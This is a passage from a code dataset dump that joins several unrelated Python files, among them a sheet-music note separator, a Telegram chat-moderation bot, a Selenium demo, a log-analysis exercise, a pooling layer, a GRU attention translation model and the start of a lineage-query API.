amount_black_pixel\n\n\ndef is_matching_pattern(spaces_between_lines):\n    spaces_between_lines = np.asarray(spaces_between_lines)\n    \n    len_spaces_between_lines = len(spaces_between_lines)   \n    \n    if len_spaces_between_lines == 0:\n        return False   \n    \n    union_and_find = Union_and_Find.Union_and_Find(spaces_between_lines, 3)\n    union_and_find.calc_eq_classes()\n    union_and_find.sort_eq_classes_by_members_descending()\n    \n    biggest = union_and_find.eq_classes.pop(0)\n    \n    nr_of_lines = (len_spaces_between_lines + 1) / 5\n    \n    len_matches = nr_of_lines == int(nr_of_lines)\n    \n    if biggest.amount_of_members % 4 == 0 and len_matches:\n        return True\n    else:    \n        return False\n\n    \ndef isBlack(pixel):\n    if pixel == True:\n        return False  \n    else:\n        return True\n    \n    \ndef isWhite(pixel):\n    return not isBlack(pixel)\n\ndef calc_amount_black_pixel_in_col(col):\n    amount_black_pixel = 0\n    \n    for pixel in col:\n        if isBlack(pixel):\n            amount_black_pixel += 1\n    \n    return amount_black_pixel\n    \n\ndef mark_col_true_if_is_on_a_note(amount_black_pixel, np_img, len_width, len_height):\n    #marked_cols = np.empty(len_width,dtype=bool)\n    marked_cols = []\n    \n    for i in range(0, len_width):\n        col = np_img[:,i].tolist()\n        amount_black_pixel_in_col = calc_amount_black_pixel_in_col(col)\n        \n        upper_bound = amount_black_pixel + amount_black_pixel * amount_black_pixel_deviation\n        \n        if amount_black_pixel_in_col > upper_bound:\n            marked_cols.append(True)\n        else:\n            marked_cols.append(False)\n\n    
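# each True entry marks a column whose black-pixel count exceeds the staff-line baseline by the configured deviation factor\n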
\n\n return marked_cols\n\ndef create_list_of_notes(marked_cols):\n is_on_a_note = False\n dist_to_prev_note = sys.maxsize\n \n notes = []\n index = 0;\n for col in marked_cols:\n if is_note_col(col) and dist_to_prev_note > tresh_pixel_to_separate and not is_on_a_note:\n #TODO : setting index to 0 if index - tresh_pixel_to_separate < 0 might cause problems\n index_lower = max(0, index - tresh_pixel_to_separate)\n note = [index_lower]\n \n dist_to_prev_note = 1\n is_on_a_note = True \n \n elif not is_note_col(col) and dist_to_prev_note > tresh_pixel_to_separate and is_on_a_note:\n note.append(index)\n notes.append(note)\n \n is_on_a_note = False\n dist_to_prev_note += 1\n \n elif not is_note_col(col) and dist_to_prev_note <= tresh_pixel_to_separate and is_on_a_note:\n dist_to_prev_note += 1\n \n elif is_note_col(col):\n dist_to_prev_note = 1 \n \n else:\n dist_to_prev_note += 1\n \n \n index += 1\n \n if is_on_a_note:\n notes.append([index_lower, index - 1])\n \n return notes\n\ndef is_note_col(col):\n if col == True:\n return True\n else:\n return False\n \ndef convert_notes_to_images(notes, out_dir, fName, np_img):\n index = 0\n fName = fName[:-4]\n for note in notes:\n note_matrix = np_img[:, note[0]:note[1]]\n note_img = Image.fromarray(note_matrix)\n note_img.save(\"{}/{}_{}.png\".format(out_dir, fName, index))\n index += 1\n \n\ndef calc_distribution_of_amount_of_related_black_pixel(marked_cols):\n is_prev_note_col = False\n actual_amount = 0\n \n distribution = []\n \n index_start = 0\n \n index = 0\n for col in marked_cols:\n \n if is_note_col(col) and is_prev_note_col == False:\n index_start = index\n is_prev_note_col = True\n actual_amount += 1\n \n if not is_note_col(col) and is_prev_note_col == True:\n distribution.append((actual_amount, index_start))\n actual_amount = 0 \n is_prev_note_col = False\n \n if is_note_col(col) and is_prev_note_col == True:\n actual_amount += 1\n \n index += 1\n \n return distribution\n\ndef delete_noise_of_marked_cols(marked_cols, distribution):\n np_marked_cols = np.array(marked_cols)\n sorted_distribution = sorted(distribution, key=lambda x: x[0])\n max_pixel = sorted_distribution.pop()[0]\n \n tresh = int(tresh_delete_noise_of_marked_cols * max_pixel) + 1\n \n to_delete = [] \n \n for actual in sorted_distribution:\n if actual[0] < tresh:\n to_delete.append(actual) \n else: \n break\n\n \n for actual in to_delete:\n index_start = actual[1]\n index_stop = actual[1] + actual[0]\n for i in range(index_start, index_stop):\n np_marked_cols[i] = False \n \n \n return np_marked_cols.tolist()\n \nif __name__==\"__main__\": \n main() \n\n","sub_path":"object_detection/separate_groups_of_notes.py","file_name":"separate_groups_of_notes.py","file_ext":"py","file_size_in_byte":8322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221961414","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Flask, render_template, url_for\nfrom scrollofsheep import tracker\n\napp = Flask(__name__)\ntemplate = 'default.html'\n\n@app.route('/')\ndef main():\n t = tracker.web_track()\n device_data = t.item_data()\n return render_template(template, device_data=device_data)\n\nif __name__ == '__main__':\n app.run()","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"223640042","text":"# coding=utf-8\nimport time\nimport random\nimport telebot\nfrom telebot import types\n\nbot = 
telebot.TeleBot(\"token\")\n\nprint(\"Бот запущен\\nСоединение\")\nbot.send_message(-1001160331786, \"Бот запущен\")\n\n@bot.message_handler(content_types=[\"new_chat_members\"])\ndef default_test(message):\n    bot.send_message(message.chat.id, \"Привет! Обязательно прочитай [правила](https://t.me/animedev/101159).\", parse_mode='Markdown')\n\n@bot.message_handler(commands=[\"banme\"])\ndef default_tesdt(message):\n    if bot.get_chat_member(message.chat.id, message.from_user.id).status == \"member\":\n        rand = random.randint(100, 1000)\n        bot.send_message(message.chat.id,\n                         \"[{0}](tg://user?id={1}) \".format(message.from_user.first_name, message.from_user.id)\n                         + \"СОЖЖЕН. По собственному желанию.\" + \"\\nНа \" + str(rand) + \" сек.\",\n                         parse_mode='Markdown')\n        bot.restrict_chat_member(message.chat.id, message.from_user.id, int(time.time() + rand),\n                                 can_send_messages=False)\n    else:\n        bot.reply_to(message,\n                     \"[{0}](tg://user?id={1}) \".format(message.from_user.first_name, message.from_user.id)\n                     + \"Извините, вы администратор чата.\\nИли уже забанены.\",\n                     parse_mode='Markdown')\n\n@bot.message_handler(commands = [\"mute\"])\ndef mute(msg):\n    try:\n        if bot.get_chat_member(msg.chat.id, msg.from_user.id).status != \"member\":\n            if bot.get_chat_member(msg.chat.id, msg.reply_to_message.from_user.id).status == \"member\":\n                if msg.reply_to_message is not None:\n                    if 1 < len(msg.text.split(\" \")) < 3:\n                        bantime = int(\" \".join(msg.text.split(' ')[1:]))\n                        if bantime > 30 and bantime < 9999999:\n                            bot.send_message(msg.chat.id, \"[{0}](tg://user?id={1}) \"\n                                             .format(msg.reply_to_message.from_user.first_name,\n                                                     msg.reply_to_message.from_user.id, ) +\n                                             \"Забанен на \" + str(bantime) + \" сек \",\n                                             parse_mode='Markdown')\n                            bot.restrict_chat_member(msg.chat.id, msg.reply_to_message.from_user.id,\n                                                     int(time.time() + bantime),\n                                                     can_send_messages=False)\n                        else:\n                            bot.send_message(msg.chat.id,\n                                             \"Число \" + str(\n                                                 bantime) + \" слишком большое или маленькое.\\nДиапозон 30-9999999\")\n                    else:\n                        bot.send_message(msg.chat.id, \"Некоректное время\")\n                else:\n                    bot.send_message(msg.chat.id, \"Используй только реплаем!\")\n            else:\n                bot.send_message(msg.chat.id, \"Пользователь является администратором\")\n        else:\n            bot.send_message(msg.chat.id, \"Вы не администратор чата.\")\n    except ValueError:\n        bot.send_message(msg.chat.id, \"Некоректное время бана\")\n\n\n@bot.message_handler(commands = [\"stop\"])\ndef stop(msg):\n    bot.send_message(-1001160331786, \"Бот отключен\")\n\nif __name__ == '__main__':\n    bot.polling(none_stop=True, timeout=120)\n","sub_path":"animedev.py","file_name":"animedev.py","file_ext":"py","file_size_in_byte":3768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"21038393","text":"# Developer: a little rookie\n# 2020/7/15 0:36\n# import the modules\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\n# create the browser driver object\ndriver = webdriver.Chrome(\"D:\\\\ruanjian\\chromedriver\\chromedriver.exe\")\n# open the URL\ndriver.get(\"https://www.baidu.com/\")\nele = driver.find_element_by_name(\"tj_briicon\")\n# hover over the located element\nActionChains(driver).move_to_element(ele).perform()\n# right-click the located element\nActionChains(driver).context_click(ele).perform()\n# double-click\nActionChains(driver).double_click(ele).perform()\n\n# open the URL\ndriver.get(\"D:\\github\\Project\\\\test\\selenium_class\\day4\\\\test2.html\")\n# locate the element to drag\nele1 = driver.find_element_by_id(\"blackSquare\")\n# locate the target element\nele2 = 
driver.find_element_by_id(\"targetEle\")\n\nActionChains(driver).drag_and_drop(ele1,ele2).perform()","sub_path":"test/selenium_class/day4/3鼠标事件.py","file_name":"3鼠标事件.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"410468165","text":"logs1 = [\n[\"58523\", \"user_1\", \"resource_1\"],\n[\"62314\", \"user_2\", \"resource_2\"],\n[\"54001\", \"user_1\", \"resource_3\"],\n[\"200\", \"user_6\", \"resource_5\"],\n[\"215\", \"user_6\", \"resource_4\"],\n[\"54060\", \"user_2\", \"resource_3\"],\n[\"53760\", \"user_3\", \"resource_3\"],\n[\"58522\", \"user_22\", \"resource_1\"],\n[\"53651\", \"user_5\", \"resource_3\"],\n[\"2\", \"user_6\", \"resource_1\"],\n[\"100\", \"user_6\", \"resource_6\"],\n[\"400\", \"user_7\", \"resource_2\"],\n[\"100\", \"user_8\", \"resource_6\"],\n[\"54359\", \"user_1\", \"resource_3\"],\n]\n\nlogs2 = [\n[\"300\", \"user_1\", \"resource_3\"],\n[\"599\", \"user_1\", \"resource_3\"],\n[\"900\", \"user_1\", \"resource_3\"],\n[\"1199\", \"user_1\", \"resource_3\"],\n[\"1200\", \"user_1\", \"resource_3\"],\n[\"1201\", \"user_1\", \"resource_3\"],\n[\"1202\", \"user_1\", \"resource_3\"]\n]\n\nimport collections \n# question 1\ndef getUserMaxMinAccessTime(logs):\n    dctUser2Time = dict()\n    for time, user, resource in logs:\n        if user not in dctUser2Time:\n            dctUser2Time[user] = [2**32, -2**32]  # [min, max]\n        dctUser2Time[user][0] = min(dctUser2Time[user][0], int(time))\n        dctUser2Time[user][1] = max(dctUser2Time[user][1], int(time))\n    return dctUser2Time\n# print(getUserMaxMinAccessTime(logs1))\n\n# question 2\ndef getHighestAccessedResource(logs):\n    dctResource2Freq = collections.defaultdict(int)\n    time2resource = [(int(time), resource) for time, _, resource in logs]\n    time2resource.sort(key = lambda x: x[0])\n    # print(time2resource)\n    left, right = 0, 0\n    max_accessed_resource = ''\n    max_freq = 0\n    while right < len(time2resource):\n        while time2resource[right][0] - time2resource[left][0] <= 300:\n            enter_r = time2resource[right][1]\n            dctResource2Freq[enter_r] += 1\n            # print('***', enter_r, dctResource2Freq)\n            if dctResource2Freq[enter_r] > max_freq:\n                max_freq = dctResource2Freq[enter_r]\n                max_accessed_resource = enter_r\n            right += 1\n            if right == len(time2resource):\n                break\n        exit_r = time2resource[left][1]\n        dctResource2Freq[exit_r] -= 1\n        left += 1\n    return max_accessed_resource, max_freq\nprint(getHighestAccessedResource(logs1))\n\n# question 3\ndef getTransitionGraph(logs):\n    dctUser2TimeResource = collections.defaultdict(list)\n    for time, user, resource in logs:\n        dctUser2TimeResource[user].append((int(time), resource))\n\n    dctResource2Next = collections.defaultdict(list)\n    for user, time_resource in dctUser2TimeResource.items():\n        time_resource.sort(key = lambda x: x[0])\n        cur_resource = 'START'\n        for i in range(len(time_resource)):\n            next_resource = time_resource[i][1]\n            dctResource2Next[cur_resource].append(next_resource)\n            cur_resource = next_resource\n        dctResource2Next[cur_resource].append('END')\n    # print(dctResource2Next)\n    \n    dctGraph = collections.defaultdict(list)\n    for key, lstResource in dctResource2Next.items():\n        for r in set(lstResource):\n            prob = lstResource.count(r) / float(len(lstResource))\n            prob = round(prob, 3)\n            dctGraph[key].append((r, prob))\n    return dctGraph\n\nprint(getTransitionGraph(logs1))\n\n\"\"\"\nProblem 2: Resource Access Log\nSuppose we have an unsorted log file of accesses to web resources. 
\nEach log entry consists of an access time, the ID of the user making the access, and the resource ID.\nThe access time is represented as seconds since 00:00:00, and all times are assumed to be in the same day.\nFor example:\nlogs1 = [\n[\"58523\", \"user_1\", \"resource_1\"],\n[\"62314\", \"user_2\", \"resource_2\"],\n[\"54001\", \"user_1\", \"resource_3\"],\n[\"200\", \"user_6\", \"resource_5\"],\n[\"215\", \"user_6\", \"resource_4\"],\n[\"54060\", \"user_2\", \"resource_3\"],\n[\"53760\", \"user_3\", \"resource_3\"],\n[\"58522\", \"user_22\", \"resource_1\"],\n[\"53651\", \"user_5\", \"resource_3\"],\n[\"2\", \"user_6\", \"resource_1\"],\n[\"100\", \"user_6\", \"resource_6\"],\n[\"400\", \"user_7\", \"resource_2\"],\n[\"100\", \"user_8\", \"resource_6\"],\n[\"54359\", \"user_1\", \"resource_3\"],\n]\nExample 2:\nlogs2 = [\n[\"300\", \"user_1\", \"resource_3\"],\n[\"599\", \"user_1\", \"resource_3\"],\n[\"900\", \"user_1\", \"resource_3\"],\n[\"1199\", \"user_1\", \"resource_3\"],\n[\"1200\", \"user_1\", \"resource_3\"],\n[\"1201\", \"user_1\", \"resource_3\"],\n[\"1202\", \"user_1\", \"resource_3\"]\n]\nQuestion 1 - Write a function that takes the logs and returns each user's min and max access timestamp\nExample Output:\nuser_3:[53760,53760]\nuser_2:[54060,62314]\nuser_1:[54001,58523]\nuser_7:[400,400]\nuser_6:[2,215]\nuser_5:[53651,53651]\nuser_4:[58522,58522]\nuser_8:[100,100]\n\nProblem 2 Follow-up:\nQuestion 2 - Write a function that takes the logs and returns the resource with the highest number of accesses \nin any 5 minute window, together with how many accesses it saw.\nExpected Output:\nmost_requested_resource(logs1) # => ('resource_3', 3) \n\nProblem 2 Follow-up Question 3 -\nWrite a function that takes the logs as input, builds the transition graph and returns it as an adjacency \nlist with probabilities. Add START and END states. \nSpecifically, for each resource, we want to compute a list of every possible next step taken by any user, \ntogether with the corresponding probabilities. 
The list of resources should include START but not END, \nsince by definition END is a terminal state.\n\nExpected output for logs1:\ntransition_graph(logs1) # =>\n{{\n'START': {'resource_1': 0.25, 'resource_2': 0.125, 'resource_3': 0.5, 'resource_6': 0.125},\n'resource_1': {'resource_6': 0.333, 'END': 0.667},\n'resource_2': {'END': 1.0},\n'resource_3': {'END': 0.4, 'resource_1': 0.2, 'resource_2': 0.2, 'resource_3': 0.2},\n'resource_4': {'END': 1.0},\n'resource_5': {'resource_4': 1.0},\n'resource_6': {'END': 0.5, 'resource_5': 0.5}\n}}\nFor example, of 8 total users, 4 users have resource_3 as a first visit (user_1, user_2, user_3, user_5), \n2 users have resource_1 as a first visit (user_6, user_22), \n1 user has resource_2 as a first visit (user_7), and 1 user has resource_6 (user_8) \nso the possible next steps for START are resource_3 with probability 4/8, resource_1 with probability 2/8, \nand resource_2 and resource_6 with probability 1/8.\nThese are the resource paths per user for the first logs example, ordered by access time:\n{{\n'user_1': ['resource_3', 'resource_3', 'resource_1'],\n'user_2': ['resource_3', 'resource_2'],\n'user_3': ['resource_3'],\n'user_5': ['resource_3'],\n'user_6': ['resource_1', 'resource_6', 'resource_5', 'resource_4'],\n'user_7': ['resource_2'],\n'user_8': ['resource_6'],\n'user_22': ['resource_1'],\n}}\nExpected output for logs2:\ntransition_graph(logs2) # =>\n{{\n'START': {'resource_3': 1.0},\n'resource_3': {'resource_3': 0.857, 'END': 0.143}\n}}\n\"\"\"","sub_path":"OutOfBag/Robinhood/resource_access_log.py","file_name":"resource_access_log.py","file_ext":"py","file_size_in_byte":6674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"125807475","text":"from contextlib import contextmanager\n\n@contextmanager\ndef shallow_bind(env, keys):\n    bk = tuple(env.get(k) for k in keys)\n    try:\n        yield\n    finally:\n        # restore the saved bindings even if the with-body raised\n        for k, v in zip(keys, bk):\n            env[k] = v\n\n@contextmanager\ndef pythonpath(new_pythonpath):\n    import sys\n    old_pythonpath = sys.path\n    sys.path = new_pythonpath\n    try:\n        yield\n    finally:\n        sys.path = old_pythonpath\n\n@contextmanager\ndef tempdir():\n    from shutil import rmtree\n    from tempfile import mkdtemp\n    d = mkdtemp()\n    try:\n        yield d\n    finally:\n        rmtree(d)\n\n@contextmanager\ndef pushd(there):\n    from os import chdir, getcwd\n    here = getcwd()\n    chdir(there)\n    try:\n        yield\n    finally:\n        chdir(here)\n","sub_path":"apymake/lib/cm.py","file_name":"cm.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"62994284","text":"import numpy as np\nfrom util import pooling2d\n\n\nclass Pooling2D(object):\n    def __init__(self, pool_shape, stride, padding = 0, pool_mode = 'max'):\n        # FEATURE MAP INPUT SHAPE:\n        # 0: width\n        # 1: height\n        # 2: channel\n        self.pool_shape = pool_shape\n        self.stride = stride\n        self.padding = padding\n        self.pool_mode = pool_mode\n        self.activation = lambda x: x\n        self.activation_deriv = lambda x: 1\n        self.input_shape = None\n        self.output_shape = None\n\n        self.backward_delta = {\n            'max': self.maximum_backward_delta,\n            'avg': self.average_backward_delta\n        }\n\n        self.updateWBO()\n\n    def updateInputShape(self, input_shape):\n        self.input_shape = input_shape\n        self.updateWBO()\n\n    def updateWBO(self):\n        if (self.input_shape != None):\n            self.output_shape = (((self.input_shape[0] + 2*self.padding - self.pool_shape[0])) // self.stride + 1,\n                                 ((self.input_shape[1] + 2*self.padding - self.pool_shape[1])) // self.stride + 1,\n                                 (self.input_shape[-1]))\n\n    def 
getSaveData(self):\n data = {\n 'name': 'Pooling2D',\n 'input_shape' : self.input_shape,\n 'pool_shape': self.pool_shape,\n 'stride': self.stride,\n 'padding': self.padding,\n 'pool_mode': self.pool_mode\n }\n\n return data\n\n def loadData(self, data):\n pass\n\n def forward(self, feature_maps):\n assert self.input_shape == feature_maps.shape[1:]\n result = np.zeros((\n feature_maps.shape[0], # num_of_feature_maps\n ((feature_maps.shape[1] + self.padding - self.pool_shape[0]) // self.stride) + 1, # width\n ((feature_maps.shape[2] + self.padding - self.pool_shape[1]) // self.stride) + 1, # height\n feature_maps.shape[3] # channel\n ))\n for idx, fmap in enumerate(feature_maps):\n result[idx] = pooling2d(fmap, self.pool_shape, self.stride, self.padding, self.pool_mode)\n\n self.output_shape = result.shape\n return result\n\n def average_backward_delta(self, neuron_input, delta, current_element, dx):\n each_batch, each_row, each_col, each_channel = current_element\n \n temp_pool = neuron_input[\n each_batch,\n (each_row * self.stride):(each_row * self.stride + self.pool_shape[0]),\n (each_col * self.stride):(each_col * self.stride + self.pool_shape[1]),\n each_channel\n ]\n\n # average = delta divided by input shape (width and height)\n average_delta = delta[each_batch, each_row, each_col, each_channel] / temp_pool.shape[0] / temp_pool.shape[1]\n\n dx[\n each_batch,\n (each_row * self.stride):(each_row * self.stride + self.pool_shape[0]),\n (each_col * self.stride):(each_col * self.stride + self.pool_shape[1]),\n each_channel\n ] += np.ones((temp_pool.shape[0], temp_pool.shape[1])) * average_delta\n return dx\n\n def maximum_backward_delta(self, neuron_input, delta, current_element, dx):\n each_batch, each_row, each_col, each_channel = current_element\n\n temp_pool = neuron_input[\n each_batch,\n (each_row * self.stride):(each_row * self.stride + self.pool_shape[0]),\n (each_col * self.stride):(each_col * self.stride + self.pool_shape[1]),\n each_channel\n ]\n # Mask True if element in pool is the max of the pool, else False\n masking = (temp_pool == np.max(temp_pool))\n dx[\n each_batch,\n (each_row * self.stride):(each_row * self.stride + self.pool_shape[0]),\n (each_col * self.stride):(each_col * self.stride + self.pool_shape[1]),\n each_channel\n ] += masking * delta[each_batch, each_row, each_col, each_channel]\n\n return dx\n\n def calcPrevDelta(self, neuron_input, delta, debug=False):\n dx = np.zeros(neuron_input.shape)\n\n for each_batch in range(delta.shape[0]):\n for each_row in range(delta.shape[1]):\n for each_col in range(delta.shape[2]):\n for each_channel in range(delta.shape[3]):\n # store each range variable to a variable, passing it easier to backward delta function\n current_element = [each_batch, each_row, each_col, each_channel]\n if (debug):\n print(\"Current Element:\\n batch :\", each_batch)\n print(\" row :\", each_row)\n print(\" column :\", each_col)\n print(\" channel:\", each_channel)\n dx = self.backward_delta[self.pool_mode](neuron_input, delta, current_element, dx)\n if (debug):\n print(\"\\n\\nDX in this element batch after backward delta\", dx)\n print(\"=============================================\")\n\n return dx\n\n def backprop(self, neuron_input, delta, lr=0.001, debug=False):\n # no weight to update, only pass the error to previous layer\n return np.zeros(()), np.zeros(())\n\n def updateWeight(self, deltaWeight, deltaBias, debug=False):\n # no weight to update, only pass the error to previous layer\n 
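# keeping this no-op lets a training loop call updateWeight on every layer without special-casing pooling\n        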
pass\n","sub_path":"src/pooling2d.py","file_name":"pooling2d.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"156589125","text":"from tensorflow.python.keras.layers import Input, GRU, Dense, Concatenate, TimeDistributed, Bidirectional, Embedding\nfrom tensorflow.python.keras.models import Model\nfrom attention import AttentionLayer\n\n\ndef define_nmt(hidden_size, batch_size, eng_timesteps, eng_vocab_size, ger_timesteps, ger_vocab_size):\n \"\"\" Defining a NMT model \"\"\"\n\n # Define an input sequence and process it.\n embedding_size = 100\n if batch_size:\n encoder_inputs = Input(batch_shape=(batch_size, eng_timesteps), name='encoder_inputs')\n decoder_inputs = Input(batch_shape=(batch_size, ger_timesteps - 1), name='decoder_inputs')\n # else:\n # encoder_inputs = Input(shape=(eng_timesteps), name='encoder_inputs')\n # decoder_inputs = Input(shape=(fr_timesteps - 1, fr_vsize), name='decoder_inputs')\n\n encoder_embedding = Embedding(input_dim = eng_vocab_size, output_dim = embedding_size)\n embedded_encoder_inputs = encoder_embedding(encoder_inputs)\n # Encoder GRU\n encoder_gru = Bidirectional(GRU(hidden_size, return_sequences=True, return_state=True, name='encoder_gru'), name='bidirectional_encoder')\n encoder_out, encoder_fwd_state, encoder_back_state = encoder_gru(embedded_encoder_inputs)\n\n decoder_embedding = Embedding(input_dim = ger_vocab_size, output_dim = embedding_size)\n embedded_decoder_inputs = decoder_embedding(decoder_inputs)\n # Set up the decoder GRU, using `encoder_states` as initial state.\n decoder_gru = Bidirectional(GRU(hidden_size, return_sequences=True, return_state=True, name='decoder_gru'), name='bidirectional_decoder')\n decoder_out, decoder_fwd_state, decoder_back_state = decoder_gru(embedded_decoder_inputs, initial_state=[encoder_fwd_state, encoder_back_state])\n\n # Attention layer\n attn_layer = AttentionLayer(name='attention_layer')\n attn_out, attn_states = attn_layer([encoder_out, decoder_out])\n\n # Concat attention input and decoder GRU output\n decoder_concat_input = Concatenate(axis=-1, name='concat_layer')([decoder_out, attn_out])\n\n # Dense layer\n dense = Dense(ger_vocab_size, activation='softmax', name='softmax_layer')\n dense_time = TimeDistributed(dense, name='time_distributed_layer')\n decoder_pred = dense_time(decoder_concat_input)\n\n # Full model\n full_model = Model(inputs=[encoder_inputs, decoder_inputs], outputs=decoder_pred)\n full_model.compile(optimizer='adam', loss='categorical_crossentropy')\n\n full_model.summary()\n\n \"\"\" Inference model \"\"\"\n batch_size = 1\n\n \"\"\" Encoder (Inference) model \"\"\"\n encoder_inf_inputs = Input(batch_shape=(batch_size, eng_timesteps), name='encoder_inf_inputs')\n encoder_inf_embedded_inputs = encoder_embedding(encoder_inf_inputs)\n encoder_inf_out, encoder_inf_fwd_state, encoder_inf_back_state = encoder_gru(encoder_inf_embedded_inputs)\n encoder_model = Model(inputs=encoder_inf_inputs, outputs=[encoder_inf_out, encoder_inf_fwd_state, encoder_inf_back_state])\n\n \"\"\" Decoder (Inference) model \"\"\"\n decoder_inf_inputs = Input(batch_shape=(batch_size, 1), name='decoder_word_inputs')\n encoder_inf_states = Input(batch_shape=(batch_size, eng_timesteps, 2*hidden_size), name='encoder_inf_states')\n decoder_init_fwd_state = Input(batch_shape=(batch_size, hidden_size), name='decoder_fwd_init')\n decoder_init_back_state = Input(batch_shape=(batch_size, hidden_size), 
name='decoder_back_init')\n\n decoder_inf_embedded_inputs = decoder_embedding(decoder_inf_inputs)\n decoder_inf_out, decoder_inf_fwd_state, decoder_inf_back_state = decoder_gru(decoder_inf_embedded_inputs, initial_state=[decoder_init_fwd_state, decoder_init_back_state])\n attn_inf_out, attn_inf_states = attn_layer([encoder_inf_states, decoder_inf_out])\n decoder_inf_concat = Concatenate(axis=-1, name='concat')([decoder_inf_out, attn_inf_out])\n decoder_inf_pred = TimeDistributed(dense)(decoder_inf_concat)\n decoder_model = Model(inputs=[encoder_inf_states, decoder_init_fwd_state, decoder_init_back_state, decoder_inf_inputs],\n outputs=[decoder_inf_pred, attn_inf_states, decoder_inf_fwd_state, decoder_inf_back_state])\n # encoder_model = \"\"\n # decoder_model = \"\"\n return full_model, encoder_model, decoder_model\n\n\nif __name__ == '__main__':\n\n \"\"\" Checking nmt model for toy examples \"\"\"\n define_nmt(64, None, 20, 30, 20, 20)","sub_path":"Neural_Machine_Translation/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"569245112","text":"# Copyright 2019 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"This file is used to define the model lineage python api.\"\"\"\nimport os\nimport numpy as np\nimport pandas as pd\n\nfrom mindinsight.lineagemgr.common.exceptions.exceptions import LineageParamValueError, \\\n LineageQuerySummaryDataError, LineageParamSummaryPathError, \\\n LineageQuerierParamException, LineageDirNotExistError, LineageSearchConditionParamError, \\\n LineageParamTypeError, LineageSummaryParseException\nfrom mindinsight.lineagemgr.common.log import logger as log\nfrom mindinsight.lineagemgr.common.utils import normalize_summary_dir, get_relative_path\nfrom mindinsight.lineagemgr.common.validator.model_parameter import SearchModelConditionParameter\nfrom mindinsight.lineagemgr.common.validator.validate import validate_filter_key, validate_search_model_condition, \\\n validate_condition, validate_path, validate_train_id\nfrom mindinsight.lineagemgr.lineage_parser import LineageParser, LineageOrganizer\nfrom mindinsight.lineagemgr.querier.querier import Querier\nfrom mindinsight.optimizer.common.enums import ReasonCode\nfrom mindinsight.optimizer.utils.utils import is_simple_numpy_number\nfrom mindinsight.utils.exceptions import MindInsightException\n\n_METRIC_PREFIX = \"[M]\"\n_USER_DEFINED_PREFIX = \"[U]\"\n\nUSER_DEFINED_INFO_LIMIT = 100\n\n\ndef get_summary_lineage(data_manager=None, summary_dir=None, keys=None):\n \"\"\"\n Get summary lineage from data_manager or parsing from summaries.\n\n One of data_manager or summary_dir needs to be specified. 
Support getting\n super_lineage_obj from data_manager or parsing summaries by summary_dir.\n\n Args:\n data_manager (DataManager): Data manager defined as\n mindinsight.datavisual.data_transform.data_manager.DataManager\n summary_dir (str): The summary directory. It contains summary logs for\n one training.\n keys (list[str]): The filter keys of lineage information. The acceptable\n keys are `metric`, `user_defined`, `hyper_parameters`, `algorithm`,\n `train_dataset`, `model`, `valid_dataset` and `dataset_graph`.\n If it is `None`, all information will be returned. Default: None.\n\n Returns:\n dict, the lineage information for one training.\n\n Raises:\n LineageParamSummaryPathError: If summary path is invalid.\n LineageQuerySummaryDataError: If querying summary data fails.\n LineageFileNotFoundError: If the summary log file is not found.\n\n \"\"\"\n default_result = {}\n if data_manager is None and summary_dir is None:\n raise LineageParamTypeError(\"One of data_manager or summary_dir needs to be specified.\")\n if data_manager is not None and summary_dir is None:\n raise LineageParamTypeError(\"If data_manager is specified, the summary_dir needs to be \"\n \"specified as relative path.\")\n\n if keys is not None:\n validate_filter_key(keys)\n\n if data_manager is None:\n normalize_summary_dir(summary_dir)\n super_lineage_obj = LineageParser(summary_dir).super_lineage_obj\n else:\n validate_train_id(summary_dir)\n super_lineage_obj = LineageOrganizer(data_manager=data_manager).get_super_lineage_obj(summary_dir)\n\n if super_lineage_obj is None:\n return default_result\n\n try:\n result = Querier({summary_dir: super_lineage_obj}).get_summary_lineage(summary_dir, keys)\n except (LineageQuerierParamException, LineageParamTypeError) as error:\n log.error(str(error))\n log.exception(error)\n raise LineageQuerySummaryDataError(\"Get summary lineage failed.\")\n return result[0]\n\n\ndef filter_summary_lineage(data_manager=None, summary_base_dir=None, search_condition=None, added=False):\n \"\"\"\n Filter summary lineage from data_manager or parsing from summaries.\n\n One of data_manager or summary_base_dir needs to be specified. Support getting\n super_lineage_obj from data_manager or parsing summaries by summary_base_dir.\n\n Args:\n data_manager (DataManager): Data manager defined as\n mindinsight.datavisual.data_transform.data_manager.DataManager\n summary_base_dir (str): The summary base directory. 
